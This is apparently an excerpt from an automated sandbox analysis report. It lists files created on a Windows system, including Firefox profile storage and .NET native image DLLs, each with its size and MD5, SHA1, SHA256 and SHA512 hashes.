C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\storage\default\https+++www.googletagmanager.com^partitionKey=%28https%2Ctelerik.com%29\cache\morgue\185\{8cd2b968-f5a6-43e3-88a5-df211bfa75b9}.final
Filesize10KB
MD539b187ae73b8c634cfbe5ab1cacd1e1b
SHA1900207060e1d5d0e8e791819c64569f45e780c2d
SHA2565c73fa7936e3897f4821ec266ba4ced95597c122e775e8a837358ce1488d98fb
SHA512ae4b6d436dea1ff3dcb0984078fc19aef43011952a37b06c9a501ec102e04f81093fa58a01d04f93be49f64de4d09d2e74f6dca89919347ea25cfc62468301fd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize384KB
MD5ac8ebf7938f9b9f77e7e466a2f1a3562
SHA1bd7d0b59722ef6040d2e58a3421f46ca589143bb
SHA256e1f021a4da711d784127138290de20a63e7648455fb635aac87d1965a6194760
SHA51227d17ef39e107966a52a1e4fd2fa5efa85723d1f03f05a8fd47e5c657eb5d67ebd26ae1ab8b4793a1a0bdb12a3c1d9d58373c263e2d7c2a2fa13da5038f48dbd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.9MB
MD5607c5e6c0116d2b0907e6bbca0ec31a3
SHA1922e1cbc34d840222df7db38c690c1a00d7eb13a
SHA256a8eaedc6e0be26f63f76538ed063cced4b312e54b0ca695c9f4a13725ff22c48
SHA512bdc753083e1d29e38ad30ea332f1c339bf5eaad590f40201ea3db7cad929ee0d580f0e391bf569770c2ac30573abf48c5372c59128a83c8374312a950c1fda84
-
Filesize
141B
MD5d7a9c29a5421078a9135ccf1cade552a
SHA1e1b43108778d359d8d9287cf59225617e1769463
SHA256bade20948c677d1d458e39a4cf6d8c4d8237263d55e63370d6272fa3243ffe28
SHA51249553b13fa1cc8d257f2ca9056742e6e11fbdce21633edeb5af6f863294f97ccf3cabe851d94bcedba03e2716311a48dcf8064eb1500f8a7c400b049bf48296f
-
Filesize
4.4MB
MD5c1980b018489df28be8809eb32519001
SHA1e860439703d7b6665af4507b20bbef2bbb7b73f4
SHA256588024037b1e5929b1f2a741fff52a207bcab17f0650ec7cb0cd3cb78051998d
SHA512f70d419e869e56700a9e23350a9779f5dd56bb78adb9a1b0d5039287a24f20004db20f842294d234d4717feaa3184a5e6d90f0ee3666208bad2ea518d37b0a35
-
Filesize
20.4MB
MD5a4f15588e330c5d1bbe137de3a5f1c34
SHA1d08d678fedca9f642f95d3bafacefe13b6aef2a1
SHA2566e84ac8d3abdfba60078a36fa7f6b492b20c2af2c502e0a4579f41367ac37c80
SHA512fd1ee623697c1c3a9bf424cbc2107a00c9c578666bed1f0c2b5bc18d7f6c780a1226686cc84bb487fc5969bb368bde9d195e19127679b202406ad26615716c30
-
Filesize
19.2MB
MD5917f67250baa4a1df4b4681c08e4076e
SHA16b7d22fc2e8f6a479e546b62a557e65c698a71e9
SHA256f943a2a7ac5080fadf3b7242fb1a99c5d5bf8feae9c8f6731262cc9c084387a5
SHA5126f995e81c7d5582fb01c5978466d57aa7bf8ff26877f1291c17eb10d752954d7bcb53b07ef4801288e3a72918f5186e9684aa1caf441dc314e5a6cec462cb441
-
Filesize
33.4MB
MD545ef12c4e9cb5c065fa0b1eaceeae45c
SHA10a7f1968a86b82e864dcd054674f4fa529c479a9
SHA2564cd52fede4e6b0946d5bc9c95531ead55ce65e10b0fc98e88f8b34a42096cec4
SHA51239ab6bd7ccf86013271e099861e07a10614502de5bf73f7a0ab99f43e727c959475817462ad0636fe39ab6888cffe1f6d24afffe25a1256ca657ca23ca297dae
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\EnableLoopback\a8e9750dcec3b7be6005a908fe2c2d8f\EnableLoopback.ni.exe
Filesize160KB
MD50965e5069f4a44a943dd21af16ebea50
SHA14a6866a29d58672a05cdbf764a45c2b682e0cd5f
SHA2562bf8d3166b4b3725564dfdf44072a6fe10c3a08574d7f5ac17aa80d7d3edc29b
SHA512394c6c71bea21aebbc9f625a360e33fbb7512e919988db106c7e4120afd6c8d0b945d3238ae2a7d5f0af2c71122d57bfd8d56133f70ad00e78b65ea9ee7e84db
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\180d439c36f3cf6ec5649e1360f67487\Microsoft.JScript.ni.dll
Filesize2.7MB
MD5a2ef1f6d5df4e7b6447b54190a3b6ccc
SHA1cbeb2b07942b3d9b95d3a7263629bcbec6b25ce1
SHA2562b14dbd9d9c8050100f813b1e51942520d49ab51ef8ffde16414ac8b35765dd4
SHA512f089315b0435d8f0cfd8523698a36205cbc493cb2ea1c561d811e9141423df20640107ad3507abba44575b970dc010d380fee6e6f3880fc8f91f63f66e000f77
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\180d439c36f3cf6ec5649e1360f67487\Microsoft.JScript.ni.dll.aux
Filesize580B
MD5b094143c78c988ef07a1bf541fccf4e6
SHA1978ba20e486e74fba9cf306a7450240a96cc314c
SHA256e6a53272d081895d24999b96ab02509ef5ac6a30a1ef901dad3f9e62252d8f80
SHA51288eb0924df8c56a1e711b87f1a548b73aa18c90a197a3733c601e90793a4e74a0c771bd764e45111832196b2f81ebd90393c21053b3a93c7d85deee5eb536f5e
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\6c172340af3f46e7e45d3cea5ee80a56\System.Data.SqlXml.ni.dll
Filesize3.0MB
MD5942af167f631f760c83a8ada0592cb82
SHA173c08eec36472b200554465ee5d6e3f7792704ed
SHA256c662e6d62258cfc15fb0fbb98fc3b428955ba2d7bbceced1e4f87a66d16b173b
SHA51255944b185f4799fa81cd03d4131d6f24506d3b8329c7a0800aae486d9e75d2dcbbef2e564e4d86cfe7bc880a2bf6bac083ccb995429061666333dc56fef68418
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\6c172340af3f46e7e45d3cea5ee80a56\System.Data.SqlXml.ni.dll.aux
Filesize708B
MD53c3231d300935c65976ed0ca2d93f346
SHA170611f15414423d2cb6db3d8bbb384e98df4996f
SHA25696ae9bed2a9512ea7858cc3b28dc28d172cd1c3c15f60fa04ee20b8063a1b1a3
SHA51228f2c7dd019085cd18995232f2a87ea45b834f08d1d4923b799917eceea6d3dfc8b1c1caf7c0a2fb215df79defd095e1d70eda12c2c75475a57e84225da9d666
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\88b596885c6a2aecfe43892d03c5ba6b\System.Deployment.ni.dll
Filesize3.0MB
MD52ad389cde81c8ddc7056e7eba382c92d
SHA199eebd8f5e3471efd5e13555426c279eb1051a17
SHA256de3a8589468a14dc7a61d19be614081d4b5000ae1604d81894f3399611e4e328
SHA512692e35cf3f0c2351eca65f139975c8c621e60b9a7a88ab12f5d60517e6f3ead20a2b04b47c5f360090d05527e9435ba620776712474829110e67fae25619e7bd
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\0c073f42cf7c0b89bd4ceb4244060ceb\System.Numerics.ni.dll
Filesize314KB
MD573699d2573263453632fe45cff1dc094
SHA1b3df4e2af5e7520eca101c52e7145a85d29ee5df
SHA256cc1326839110e27d2cbf5cf72d74e36ebe6346f65993353cf7c8ea5afd4be381
SHA512489630de5b13fc1cc0ac6c93baa76b9a31da0fa48b9f53fe40d55606d3b5b344fb5bd10e549194a4187f90bb605c39b9d46ba34d93e9436862984b6688f5a71a
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\0c073f42cf7c0b89bd4ceb4244060ceb\System.Numerics.ni.dll.aux
Filesize300B
MD5905fbaf34d730796e231f38c60feffeb
SHA1a8f995d3b27f6ea0feb485870832560025b50e4e
SHA256b04b3113d61b1756e9b8087df88533276adaab7ece3d4e18cba1e956f662f21e
SHA5124716d2ea8f71362bb5264a69abd252276fda352712ef89a7433c66366907a47b96ce3c50925a9036f9f378e5e67de2f94a2a74a4c99ca97930ef6b274c60f6f2
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\ab300698ff0e6328a779058c8a6abc9a\System.Runtime.Serialization.Formatters.Soap.ni.dll
Filesize345KB
MD5fa423347a2e17ce6ad208963bcccea75
SHA1bfbe02326cbc38d16fcb7c18ae93cd5b19ef1bf4
SHA25636182d6b01a0529c83f20732a1a62430d3f446bed2a8094b4a5b57423228973d
SHA5123d99f29b8c16fe568d1f2771faad856446da626f7dc368944b4d315d1a6f603c900c70f44346febecc3f709871c3efa37afaf227ac10de81eb30ea0268f54cd0
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\42c7a19a453afb14fda2fe8479e4d8b2\System.Security.ni.dll
Filesize986KB
MD5898474cba76cf084b5d914c0f2f8f07c
SHA18a93edb2b46038c0e4b916f8d48c96abe0cfc241
SHA256f2fd3ae74d836a4f971b4d8eccb109e27cd9e9f8d62ae8a4dd248828d4c936e0
SHA512d1fae5172a4fed48fefc78954390ce356936a3bfb2331640355bc9c3659585b2f1aeda897a2c490586934682083522839b691b45fb2205c87c4cab926d5d5640
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\42c7a19a453afb14fda2fe8479e4d8b2\System.Security.ni.dll.aux
Filesize912B
MD52919ee7ce3a32fb9281b48b99fb0b92c
SHA16aab45597d8a120a9373bac86fe3cbb19ff8e470
SHA256d00cbd723a0870bc12e155e0edd51defcec623bb0c8fe0e927ea196da545e6a2
SHA512b6fdbc82671af88a79e1ea6e0942a493e13a3c2527f3512079dd48b62ca704d988311ce33a944556766cea64d1b4be5460920de938c2e0ac6975e4ec55c714c1
-
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Web\debe458f6197408829bf76c18c262527\System.Web.ni.dll
Filesize16.2MB
MD56ec78f886589d95ea7f788af3923deb5
SHA1d5247883bfc4f7bf92cc1d3e062eccf89a31f3c1
SHA2564e01f30dcb3ee4cde2ba0d9cebe4958c7ed16b55d549b29559989104c2e8ebba
SHA5129a5375a435f1d11903a7964fe89c31df168ab96ab1c23835705b46fe5c162aebef2df7b2594caad97868dbb97015ee1c0b6241d687034267cdd2d1fad5e7bb8c
-
Filesize
644B
MD5659b7690365e7746edfe6e96c3f11d6d
SHA1fdcd84bb30c5c8adeb6c9341dcba873ad3994c07
SHA25695129a62658451e9a013e7f482bebbd2fd48c2925dca596ade2b5b9bcaa23309
SHA512fc52c330aa042ab816e739f117e1fc0208ea8855ec6a9e19b8e3ab42b18af61794429ae85d1b8b9d902c06ae64897215e721c66674b64b31f7ca6c91034af985
-
Filesize
1KB
MD5218a0ba6f4d67451c5de690e2d79a50b
SHA12d88b63c563de1335f76678a7736d16ad0107f77
SHA2565b3d423230067b3cd4270224ff23c0f65c4f0309525f3f0e8a9ecd4b05f633f5
SHA51298043423bbfa6d92ce2b1077639a53ebbbe4af7fb24553e22f34ae68cc5b49d79df7d3ae6a6035567978787bbf467f7ebedc55ff3c8add1c3a20f19cf2f5acf3